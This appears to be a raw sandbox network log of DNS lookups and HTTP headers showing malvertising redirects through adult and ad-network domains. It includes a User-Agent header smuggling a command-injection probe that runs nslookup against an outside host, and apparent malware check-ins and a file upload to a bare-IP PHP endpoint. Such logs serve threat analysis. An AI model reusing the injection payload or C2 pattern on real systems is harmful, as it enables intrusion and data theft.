Date: Mon, 06 Sep 2021 09:54:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSmillustry.topRequestmillustry.topIN AResponsemillustry.topIN A13.227.222.89millustry.topIN A13.227.222.110millustry.topIN A13.227.222.73millustry.topIN A13.227.222.102
-
DNSnkwintenc.bizRequestnkwintenc.bizIN AResponsenkwintenc.bizIN A52.222.139.113nkwintenc.bizIN A52.222.139.51nkwintenc.bizIN A52.222.139.58nkwintenc.bizIN A52.222.139.45
-
GEThttp://millustry.top/redirect?tid=927574RequestGET /redirect?tid=927574 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'"`0&nslookup xlmq45hd8kx3yek5qx3wa8fszj5iv6sunhd52.b.inty.io.&`'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://pornhub.bid/adv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
DNSstats.g.doubleclick.netRequeststats.g.doubleclick.netIN AResponsestats.g.doubleclick.netIN CNAMEstats.l.doubleclick.netstats.l.doubleclick.netIN A173.194.69.156stats.l.doubleclick.netIN A173.194.69.155stats.l.doubleclick.netIN A173.194.69.154stats.l.doubleclick.netIN A173.194.69.157
-
DNSwww.statcounter.comRequestwww.statcounter.comIN AResponsewww.statcounter.comIN A172.67.38.97www.statcounter.comIN A104.22.53.65www.statcounter.comIN A104.22.52.65
-
DNSstats.g.doubleclick.netRequeststats.g.doubleclick.netIN AResponsestats.g.doubleclick.netIN CNAMEstats.l.doubleclick.netstats.l.doubleclick.netIN A173.194.69.155stats.l.doubleclick.netIN A173.194.69.157stats.l.doubleclick.netIN A173.194.69.156stats.l.doubleclick.netIN A173.194.69.154
-
DNSsearch.yahoo.comRequestsearch.yahoo.comIN AResponsesearch.yahoo.comIN CNAMEds-global3.l7.search.ystg1.b.yahoo.comds-global3.l7.search.ystg1.b.yahoo.comIN A212.82.100.137
-
DNSmaoss.infoRequestmaoss.infoIN AResponsemaoss.infoIN A5.181.218.143
-
DNSfreeslut.xyzRequestfreeslut.xyzIN AResponsefreeslut.xyzIN A194.59.164.58
-
GEThttp://alfad.pro/go/266933/622591RequestGET /go/266933/622591 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:54:45 GMT
Server: nginx
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive
-
DNSxmlp.search.yahoo.comRequestxmlp.search.yahoo.comIN AResponsexmlp.search.yahoo.comIN CNAMEglobal3.l7.search.ystg1.b.yahoo.comglobal3.l7.search.ystg1.b.yahoo.comIN A212.82.100.137
-
DNStranslate.googleapis.comRequesttranslate.googleapis.comIN AResponsetranslate.googleapis.comIN A142.250.179.138
-
DNScdn.p-n.ioRequestcdn.p-n.ioIN AResponsecdn.p-n.ioIN A13.227.222.22cdn.p-n.ioIN A13.227.222.72cdn.p-n.ioIN A13.227.222.5cdn.p-n.ioIN A13.227.222.114
-
DNSc.statcounter.comRequestc.statcounter.comIN AResponsec.statcounter.comIN A172.67.38.97c.statcounter.comIN A104.22.53.65c.statcounter.comIN A104.22.52.65
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSlogger007.cam4.comRequestlogger007.cam4.comIN AResponselogger007.cam4.comIN A184.94.152.23
-
DNSpornhub.bidRequestpornhub.bidIN AResponsepornhub.bidIN A207.180.237.38
-
DNSass18.xyzRequestass18.xyzIN AResponseass18.xyzIN A178.238.238.213
-
DNSxmom.usRequestxmom.usIN AResponsexmom.usIN A167.86.121.34
-
GEThttp://alfad.pro/go/266933/611138RequestGET /go/266933/611138 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://sex.sexy-wife.com/ungads.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:54:51 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 327
Connection: keep-alive
-
GEThttp://pornhub.bid/goung.phpRequestGET /goung.php HTTP/1.1
Host: pornhub.bid
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://ass18.xyz/index.htmRequestGET /index.htm HTTP/1.1
Host: ass18.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 10; SM-M305F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/84.0.4147.111 Mobile Safari/537.36 GSA/11.21.9.21.arm64
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:51 GMT
Content-Type: text/html
Content-Length: 101
Last-Modified: Fri, 13 Aug 2021 02:24:37 GMT
Connection: keep-alive
ETag: "6115d7e5-65"
Accept-Ranges: bytes
-
GEThttp://xmom.us/index.htmRequestGET /index.htm HTTP/1.1
Host: xmom.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0; KTXN B671380784A77460T1390849P1) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:51 GMT
Content-Type: text/html
Content-Length: 234
Last-Modified: Mon, 30 Aug 2021 08:49:49 GMT
Connection: keep-alive
ETag: "612c9bad-ea"
Accept-Ranges: bytes
-
DNSgoogleads.g.doubleclick.netRequestgoogleads.g.doubleclick.netIN AResponsegoogleads.g.doubleclick.netIN A142.250.179.162
-
DNSgoogleads.g.doubleclick.netRequestgoogleads.g.doubleclick.netIN AResponsegoogleads.g.doubleclick.netIN A216.58.208.98
-
DNSjita.rtk.ioRequestjita.rtk.ioIN AResponsejita.rtk.ioIN CNAMEjita-rtk-io-dmyt03fgsksh5xx.stackpathdns.comjita-rtk-io-dmyt03fgsksh5xx.stackpathdns.comIN A151.139.240.35
-
DNSnicebaby.xyzRequestnicebaby.xyzIN AResponsenicebaby.xyzIN A207.180.237.38
-
DNSyaode.liveRequestyaode.liveIN AResponseyaode.liveIN A212.107.18.203
-
DNSdkre4lyk6a9bt.cloudfront.netRequestdkre4lyk6a9bt.cloudfront.netIN AResponsedkre4lyk6a9bt.cloudfront.netIN A13.227.211.209dkre4lyk6a9bt.cloudfront.netIN A13.227.211.185dkre4lyk6a9bt.cloudfront.netIN A13.227.211.197dkre4lyk6a9bt.cloudfront.netIN A13.227.211.2
-
GEThttp://nicebaby.xyz/default.phpRequestGET /default.php HTTP/1.1
Host: nicebaby.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.3.18 (KHTML, like Gecko) Version/7.1.3 Safari/537.85.12
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://dkre4lyk6a9bt.cloudfront.net/?lerkd=936392RequestGET /?lerkd=936392 HTTP/1.1
Host: dkre4lyk6a9bt.cloudfront.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-J700F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/185.0.0.39.72;]
Accept: */*
Referer: http://hornytit.us/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
DNSbaide.liveRequestbaide.liveIN AResponsebaide.liveIN A212.107.18.203
-
GEThttp://nkwintenc.biz/redirect?tid=929948RequestGET /redirect?tid=929948 HTTP/1.1
Host: nkwintenc.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; EIE10;ENUSMSE; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://fuckteen.xyz/goads.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csu=569882f2-6ac5-4ab0-9ab4-39ab151e3a29
-
DNSdq06u9lt5akr2.cloudfront.netRequestdq06u9lt5akr2.cloudfront.netIN AResponsedq06u9lt5akr2.cloudfront.netIN A52.222.137.133dq06u9lt5akr2.cloudfront.netIN A52.222.137.166dq06u9lt5akr2.cloudfront.netIN A52.222.137.10dq06u9lt5akr2.cloudfront.netIN A52.222.137.81
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A172.67.192.135nsparket.topIN A104.21.52.2
-
GEThttp://dq06u9lt5akr2.cloudfront.net/?tluqd=936784RequestGET /?tluqd=936784 HTTP/1.1
Host: dq06u9lt5akr2.cloudfront.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0; KTXN B671380784A77460T1390849P1) like Gecko
Accept: */*
Referer: http://xmom.us/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Length: 48639
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:54:56 GMT
access-control-allow-origin: *
Cache-Control: no-store, no-cache, proxy-revalidate, must-revalidate, private, no-transform
Content-Encoding: gzip
Pragma: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 dbd13e5e9621f4e45e6a452ed9862bf1.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS50-C1
X-Amz-Cf-Id: BUWbZKEhwo-ZurIgSmep2POT9VDf8VH7lisyYpB8-hxi-hv88Vs-dA==
-
GEThttp://nsparket.top/redirect?tid=922613RequestGET /redirect?tid=922613 HTTP/1.1
Host: nsparket.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://hubtube.ru/adv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Date: Mon, 06 Sep 2021 09:54:56 GMT
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
cache-control: no-store, no-cache, must-revalidate, no-transform
pragma: no-cache
p3p: CP="NID DSP ALL COR"
set-cookie: csu=5bf7fe77-8511-4308-a12e-7be4c9707570
location: https://xml.bid-engine.com/click?i=vkGnEW-FXFE_0
x-cache: Miss from cloudfront
via: 1.1 32f32412600ac6ef6d3d418a75accb72.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS50-C1
x-amz-cf-id: jurd8pnprkii0nfZ-nNp3FBEDYhsUJF73YxjxUHNpXo6E4dgy8b-SQ==
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QGSRNx47hwuvR94O%2FE4orUj467jFb%2BNfmwcyUXSr7B6aeCX3j8AxKaW1PH4gTEect8xEyaeiuWu2Wus3xDRAcfWw%2Bf6Gf5iuZiw5cZIOH8QNcFgmFmJ794hlTt%2FR%2FTw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6d19c9f56c847-AMS
alt-svc: h2=":443"; ma=60
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSxml.bid-engine.comRequestxml.bid-engine.comIN AResponsexml.bid-engine.comIN CNAMEad-maven.xml.ak-is2.netad-maven.xml.ak-is2.netIN A198.134.116.29
-
DNSlthampio.topRequestlthampio.topIN AResponselthampio.topIN A65.9.73.51lthampio.topIN A65.9.73.24lthampio.topIN A65.9.73.27lthampio.topIN A65.9.73.111
-
DNSnkwintenc.bizRequestnkwintenc.bizIN AResponsenkwintenc.bizIN A65.9.73.46nkwintenc.bizIN A65.9.73.49nkwintenc.bizIN A65.9.73.60nkwintenc.bizIN A65.9.73.61
-
DNSimage6.pubmatic.comRequestimage6.pubmatic.comIN AResponseimage6.pubmatic.comIN CNAMEpugm22000nfc.pubmatic.compugm22000nfc.pubmatic.comIN CNAMEpugm22000nf.pubmatic.compugm22000nf.pubmatic.comIN A185.64.189.115
-
DNSdiabasewoodhouse.xyzRequestdiabasewoodhouse.xyzIN AResponsediabasewoodhouse.xyzIN A34.196.13.28
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSnkwintenc.bizRequestnkwintenc.bizIN AResponsenkwintenc.bizIN A52.222.139.113nkwintenc.bizIN A52.222.139.45nkwintenc.bizIN A52.222.139.51nkwintenc.bizIN A52.222.139.58
-
DNSyportal.xyzRequestyportal.xyzIN AResponseyportal.xyzIN A62.171.142.250
-
DNSm1.firon.xyzRequestm1.firon.xyzIN AResponsem1.firon.xyzIN A173.236.118.100
-
GEThttp://diabasewoodhouse.xyz/?k=1578b6cb9204de886df2d29f22c5b494.1630922024.179.2.1.cmV0cmlidXRpb25zYWxvb24ueHl6&r=&z=-480RequestGET /?k=1578b6cb9204de886df2d29f22c5b494.1630922024.179.2.1.cmV0cmlidXRpb25zYWxvb24ueHl6&r=&z=-480 HTTP/1.1
Host: diabasewoodhouse.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Server: nginx
Date: Mon, 06 Sep 2021 09:54:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: tpp_u=0%3B1631008496; expires=Wed, 08-Sep-2021 09:54:56 GMT; path=/
Set-Cookie: tpp_6561771_l=1034%3B1631008496; expires=Wed, 08-Sep-2021 09:54:56 GMT; path=/
Set-Cookie: tpp_ov=102611%3B1631008496; expires=Wed, 08-Sep-2021 09:54:56 GMT; path=/
Set-Cookie: tpp_ov=102611%2C102652%3B1631008496; expires=Wed, 08-Sep-2021 09:54:56 GMT; path=/
Set-Cookie: tpp_ov=102611%2C102652%2C103109%3B1631008496; expires=Wed, 08-Sep-2021 09:54:56 GMT; path=/
Expires: Mon, 31 Dec 2001 23:59:59 GMT
Pragma: no-cache
Set-Cookie: tpp_oc=103109%3B1631008496; expires=Wed, 08-Sep-2021 09:54:56 GMT; path=/
Location: http://www.signupandturnyourscreenoffsafepowernow.date/zzz?yqsp=u5ARjqQKdv6zke0GG7LdkA0khF8jfuCy4l_DA5qciZZqkzFRtE4gGnbdZCQdGFK5uMDFI_ZNQiA7WvdcbQk0pA..&sid=&subid=103109_4bae97e155463612e2fe01be069ba16f
-
DNSmaodes.comRequestmaodes.comIN AResponsemaodes.comIN A5.181.218.143
-
DNSnkwintenc.bizRequestnkwintenc.bizIN AResponsenkwintenc.bizIN A65.9.73.61nkwintenc.bizIN A65.9.73.46nkwintenc.bizIN A65.9.73.60nkwintenc.bizIN A65.9.73.49
-
GEThttp://alfad.pro/go/266933/628713RequestGET /go/266933/628713 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:54:56 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 272
Connection: keep-alive
-
GEThttp://yportal.xyz/bb.phpRequestGET /bb.php HTTP/1.1
Host: yportal.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSmillustry.topRequestmillustry.topIN AResponsemillustry.topIN A13.227.222.110millustry.topIN A13.227.222.73millustry.topIN A13.227.222.102millustry.topIN A13.227.222.89
-
DNShornytit.usRequesthornytit.usIN AResponsehornytit.usIN A207.180.237.38
-
GEThttp://alfad.pro/ad/ad?p=266933&w=628698&t=cd4e906ac0eefe88&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=628698&t=cd4e906ac0eefe88&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/601.7.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/628698
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:54:56 GMT
Location: https://www.onlinecasinoground.nl/live-casino-spelen/
Server: nginx
Content-Length: 0
Connection: keep-alive
-
DNSxnxxn.ruRequestxnxxn.ruIN AResponsexnxxn.ruIN A2.57.89.186
-
GEThttp://hornytit.us/index.htmRequestGET /index.htm HTTP/1.1
Host: hornytit.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:56 GMT
Content-Type: text/html
Content-Length: 282
Last-Modified: Tue, 13 Apr 2021 07:57:56 GMT
Connection: keep-alive
ETag: "60754f04-11a"
Accept-Ranges: bytes
-
GEThttp://nkwintenc.biz/redirect?tid=930891RequestGET /redirect?tid=930891 HTTP/1.1
Host: nkwintenc.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/43.0.2357.61 Mobile/12H321 Safari/600.1.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://weightlose.tw/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:54:56 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
set-cookie: csu=e2959ef4-08e0-4542-891e-eaeede3b291b
Location: http://eu.dspultra.com/api/submit_form_request?p=d19e1c4e-6af3-45fc-9746-cc1cfc038e66&ts=1630922096&z=4345477
X-Cache: Miss from cloudfront
Via: 1.1 26102629399121e9a9caaf60dcb59d4f.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS50-C1
X-Amz-Cf-Id: H87nVDfBUEvu85TnubeM43yQXqviiIEaA-6fnXdCxc49CUyke48mUg==
-
GEThttp://nkwintenc.biz/redirect?tid=930787RequestGET /redirect?tid=930787 HTTP/1.1
Host: nkwintenc.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://jptube.us/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csu=a6ef5420-ebde-4d93-9206-fb9522ca2eb7
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:54:56 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
Location: https://xml.bid-engine.com/click?i=LhGkzgaVMsg_0
X-Cache: Miss from cloudfront
Via: 1.1 0186e9c41d0aebb13c1398b95b7f4757.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS1-C1
X-Amz-Cf-Id: fTzFzlyF9J5gG1uz1t5kYxm4njPvW01ypyrmDehtVFux_y1tXBQJAA==
-
GEThttp://lthampio.top/redirect?tid=917725RequestGET /redirect?tid=917725 HTTP/1.1
Host: lthampio.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://befuck.ru/ad.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
GEThttp://alfad.pro/ad/ad?p=266933&w=622591&t=9de21d1d6dd8fa62&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=622591&t=9de21d1d6dd8fa62&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/622591
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:54:56 GMT
Location: http://xu2.com/script/s2iurl.php?csid=1933927&s1=622591&md=0&stamat=m%7C%2C%2CAjPiN2ISoGU3B5-GH0dEdHP3xP.5f4%2CNfrBSYIWtY1N7diiP32l-SlJx_IQ8zugqcygUKqk3dhTi67wAyoz451QG4PAoR8SQfhMF-1ZiS6-L86zJpFZRAtZhGir0ZQKxmNU2nVs7ba2DxNKYP2MoB2mKW6wYRMuhsXHZdlE-TfyPrZp7_gUyrM9GLkLXjcl7GoQXco96aIcrNqSg39XWYSQIY7BInydqIzJWyHqSrxL6ZEU-gkj259FhioyLWkwNc_poBzNB4b6uiOktvg0kVgvH5cs2bWgu5CZY-I2PiozElOVcda2PCvLr-OdX2r0yFPGTk1ZVKR3Wkj9spG3kWDbi9vhayPY9lnu4MN10_ZzyFhbrWQvuq3CgVDDagchI3n4M1xKedW5pdXCAKVbsO20M18lSb-pE6-3gqHNq-SZQMLqCWm6QZqjR0a6wJOqwrRLYSeZ5f6-olORfsQnQx5aYG5OPlak8EhxoLxfxXBx7JTQnpkEsRspV3DTZCqWZGD4h77MTxFDTzFxBp5_6QR7s5-8yOIhiFYBcMtSdrrCfIhDeO0v7O87wIdAWKN8dLJfLwzaB6qOSlbnA2QU6Px3mZFHra4Bb7h-6Qj6amJSFjgtL6Q02Q%2C%2C#pc360582
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://nkwintenc.biz/redirect?tid=929948RequestGET /redirect?tid=929948 HTTP/1.1
Host: nkwintenc.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://fuckteen.xyz/goads.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csu=d19d0cd4-f311-4955-979f-0588ccb68895
-
GEThttp://millustry.top/redirect?tid=927574RequestGET /redirect?tid=927574 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://pornhub.bid/adv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
DNSk.p-n.ioRequestk.p-n.ioIN AResponsek.p-n.ioIN A3.232.224.72k.p-n.ioIN A54.164.26.87k.p-n.ioIN A3.91.146.122k.p-n.ioIN A54.196.81.152k.p-n.ioIN A3.217.173.165k.p-n.ioIN A52.206.173.148k.p-n.ioIN A35.168.199.241k.p-n.ioIN A34.226.130.167
-
DNSwww.google.nlRequestwww.google.nlIN AResponsewww.google.nlIN A142.251.36.3
-
POSThttp://185.215.113.202/PmVc3sOf/index.phpRequestPOST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:55:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
POSThttp://185.215.113.202/PmVc3sOf/index.php?scr=1RequestPOST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----c6f0e84244546454ed8686478fb01220
Host: 185.215.113.202
Content-Length: 48157
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:55:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
DNSapex.go.sonobi.comRequestapex.go.sonobi.comIN AResponseapex.go.sonobi.comIN CNAMEams-1-apex.go.sonobi.comams-1-apex.go.sonobi.comIN A178.162.133.150
-
